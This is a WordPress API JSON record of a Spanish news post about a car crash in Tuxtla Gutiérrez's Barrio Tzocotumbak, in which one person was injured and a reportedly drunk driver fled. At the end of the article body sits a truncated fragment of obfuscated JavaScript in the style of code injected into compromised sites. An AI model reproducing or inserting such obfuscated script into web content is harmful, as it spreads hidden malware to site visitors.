{"id":9549,"date":"2023-04-14T03:47:51","date_gmt":"2023-04-14T03:47:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9549"},"modified":"2023-04-14T03:47:51","modified_gmt":"2023-04-14T03:47:51","slug":"choque-en-el-barrio-tzocotumbak-deja-un-herido","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9549","title":{"rendered":"Choque en el barrio Tzocotumbak deja un herido"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681443829103.jpg\" alt=\"\" class=\"wp-image-9550\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681443829103.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681443829103-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 13 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un herido fue el saldo de un choque entre dos unidades ocurrido este jueves por la noche en calles del Barrio Tzocotumbak.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, las unidades involucradas fueron una Urvan de una empresa de paqueter\u00eda y un VW Jetta de color gris.<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que, el veh\u00edculo compacto circulaba en la 1a Sur en el sentido de Poniente a Oriente y al llegar a la 13 Oriente no respet\u00f3 la preferencia y pas\u00f3 sin precauci\u00f3n.<\/p>\n\n\n\n<p>La Urvan se desplazaba de Sur a Norte, con preferencia e impact\u00f3 al Jetta.<\/p>\n\n\n\n<p>Testigos relataron que, el conductor del veh\u00edculo escap\u00f3 del lugar, y se presume iba en estado de ebriedad.<\/p>\n\n\n\n<p>El conductor de la Urvan fue atendido por param\u00e9dicos a un hospital particular.<\/p>\n\n\n\n<p>Las unidades fueron llevadas a un corral\u00f3n en turno para determinar la responsabilidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 13 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un herido fue el saldo de un choque entre dos unidades ocurrido este jueves por la noche en calles del Barrio Tzocotumbak. Los reportes oficiales informaron que, las unidades involucradas fueron una Urvan de una empresa de paqueter\u00eda y un VW Jetta de color &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9550,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9549","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9549","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9549"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9549\/revisions"}],"predecessor-version":[{"id":9551,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9549\/revisions\/9551"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9550"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9549"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9549"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9549"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}